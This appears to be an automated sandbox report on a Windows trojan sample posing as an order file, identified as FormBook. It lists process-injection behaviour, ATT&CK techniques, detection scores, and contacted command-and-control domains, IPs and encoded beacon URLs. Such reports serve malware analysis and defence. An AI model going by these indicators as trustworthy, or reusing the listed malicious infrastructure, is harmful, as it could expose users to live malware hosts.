          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412023 Sample: Order 122001-220 guanzo.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.amesshop.com 2->31 33 amesshop.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 11 Order 122001-220 guanzo.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\...\Order 122001-220 guanzo.exe.log, ASCII 11->29 dropped 57 Injects a PE file into a foreign processes 11->57 15 Order 122001-220 guanzo.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 pasteleriaruth.com 162.241.62.63, 49729, 80 UNIFIEDLAYER-AS-1US United States 18->35 37 www.dmowang.com 104.164.26.246, 49726, 80 EGIHOSTINGUS United States 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 mstsc.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order 122001-220 guanzo.exe63%VirustotalBrowse
          Order 122001-220 guanzo.exe35%MetadefenderBrowse
          Order 122001-220 guanzo.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Order 122001-220 guanzo.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Order 122001-220 guanzo.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.dmowang.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.comicstattoosnguns.com/meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre0%Avira URL Cloudsafe
          http://www.amesshop.com/meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox0%Avira URL Cloudsafe
          http://www.thefrankversion.com/meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.pocopage.com/meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7S0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.shadyshainarae.com/meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.dmowang.com/meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.tjanyancha.com/meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA0%Avira URL Cloudsafe
          http://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          http://www.searchvity.com/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays50%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.goeseo.com/meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj0%Avira URL Cloudsafe
          www.uuoouu-90.store/meub/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thefrankversion.com
          34.102.136.180
          truefalse
            unknown
            amesshop.com
            34.102.136.180
            truefalse
              unknown
              www.dmowang.com
              104.164.26.246
              truetrueunknown
              parkingpage.namecheap.com
              198.54.117.216
              truefalse
                high
                comicstattoosnguns.com
                34.102.136.180
                truefalse
                  unknown
                  www.tjanyancha.com
                  107.164.93.172
                  truetrue
                    unknown
                    shadyshainarae.com
                    34.102.136.180
                    truefalse
                      unknown
                      www.goodcreditcardshome.info
                      18.219.49.238
                      truetrue
                        unknown
                        www.goeseo.com
                        66.96.162.130
                        truetrue
                          unknown
                          pasteleriaruth.com
                          162.241.62.63
                          truetrue
                            unknown
                            www.shadyshainarae.com
                            unknown
                            unknowntrue
                              unknown
                              www.xn--80aasvjfhla.xn--p1acf
                              unknown
                              unknowntrue
                                unknown
                                www.pocopage.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.amesshop.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.paperplaneexplorer.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.usapersonalshopper.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.comicstattoosnguns.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.thefrankversion.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.pasteleriaruth.com
                                            unknown
                                            unknowntrue
                                              unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.comicstattoosnguns.com/meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXrefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.amesshop.com/meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLjfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Oxtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.thefrankversion.com/meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLjfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.pocopage.com/meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.shadyshainarae.com/meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nibfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dmowang.com/meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tjanyancha.com/meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWAtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.goeseo.com/meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              www.uuoouu-90.store/meub/true
                                              • Avira URL Cloud: safe
                                              low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.tiro.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7Smstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssOrder 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.carterandcone.comlexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netDexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.searchvity.com/mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.%s.comPAexplorer.exe, 00000002.00000002.932522691.0000000002B50000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  low
                                                                  http://www.fonts.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.searchvity.com/?dn=mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder 122001-220 guanzo.exe, 00000000.00000002.672299597.0000000002541000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sakkal.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      107.164.93.172
                                                                      www.tjanyancha.comUnited States
                                                                      18779EGIHOSTINGUStrue
                                                                      34.102.136.180
                                                                      thefrankversion.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      18.219.49.238
                                                                      www.goodcreditcardshome.infoUnited States
                                                                      16509AMAZON-02UStrue
                                                                      162.241.62.63
                                                                      pasteleriaruth.comUnited States
                                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                                      66.96.162.130
                                                                      www.goeseo.comUnited States
                                                                      29873BIZLAND-SDUStrue
                                                                      104.164.26.246
                                                                      www.dmowang.comUnited States
                                                                      18779EGIHOSTINGUStrue
                                                                      198.54.117.216
                                                                      parkingpage.namecheap.comUnited States
                                                                      22612NAMECHEAP-NETUSfalse

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:412023
                                                                      Start date:12.05.2021
                                                                      Start time:10:49:16
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 13s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:Order 122001-220 guanzo.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:5
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/1@13/7
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 12.4% (good quality ratio 10.9%)
                                                                      • Quality average: 71.2%
                                                                      • Quality standard deviation: 32.2%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      10:50:15API Interceptor1x Sleep call for process: Order 122001-220 guanzo.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      18.219.49.238PO9448882.exeGet hashmaliciousBrowse
                                                                      • www.goodcreditcardshome.info/meub/?8p64Z2=V6A8xrZp&y8y=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045ev+tDntqFRk
                                                                      Bs04AQyK2o.exeGet hashmaliciousBrowse
                                                                      • www.myattorneypicksnowonline.info/cyna/?AnB=O0DXDNwPE&GzuD=QlqunCFLfjJqxV/yJCze+AvWCSb5dgMSWlYge6YDzwoRQ//tSmh1eiTvl1ncSRgieIqF
                                                                      Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                      • www.greaterdiabetes.info/bw82/?K4k0=QSf3WUlUuQtxRpqTh0PyZWAWCLqQSiplzZ1yvio+dQu1sol/QfNL/rp7Q9iT+rghV3Ar&dDH=P0GPezWpdVGtah
                                                                      INTABINA.exeGet hashmaliciousBrowse
                                                                      • www.bipolartreatmentcenters.info/t65/?o8bdE=CaWwaRYeWES2ZpJp03tplUpNjUx+TtQQvGnSFVeAPVbx3JhsarFIKTbTEy9q2/vEn+U6&ElP=VZyLPx2Pwh4XuHxP
                                                                      66.96.162.13050% payment.exeGet hashmaliciousBrowse
                                                                      • www.nicksayler.net/ey9c/?VRKt=wBZlC2d0f6W4LB&BZOPIF=zemMvuHYOZF6HFuoZzbL7otG0FuLt5HQ0QHjJ1h3UiaYeVUoeANMZZbryDjJGiqNYZ4O
                                                                      o0Ka2BsNBq.exeGet hashmaliciousBrowse
                                                                      • www.imaginenationnetwork.com/8rg4/?AdkDpFa=8m/W0lhjduV58ZCB+v/V4udkt2Gx5MpGpLsDd1ppZKo4MszNwiI0YkW1Mn6ANFSTV5IZUjNr5g==&pPX=EFQD_FT0CVqx
                                                                      43order pdf.exeGet hashmaliciousBrowse
                                                                      • www.admarketingsales.com/nk7/?VBl=XTL8HNfpyPY&hdr4D=Lc54ZMkx7TXzX8Hn+HSOC/SDZ1fuYvEd/qDSQ5e94F4oyaPb0rbdlEOtPyLKhkDNTfwG
                                                                      198.54.117.216Purchase Order.exeGet hashmaliciousBrowse
                                                                      • www.beautiful.tours/u8nw/?jZhtajbP=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf7fUay48reW+&wJB=-ZLXOP0XzvBHZPRp
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • www.beautiful.tours/u8nw/?iL3=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf4zuZzUHop3vdg1M+Q==&z6A=7n3h7JeH
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • www.tab-nejersey.com/bncm/?LXedv=gRRRQVunFc3rumuoaYeGWZdKAARhtbqMo9o+4TfiCOcYfsgfAtZcdfy2djC7awoP2YIn&lhv4=O0DPaJ7hHb34yZ
                                                                      g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                                      • www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P
                                                                      24032130395451.pdf .exeGet hashmaliciousBrowse
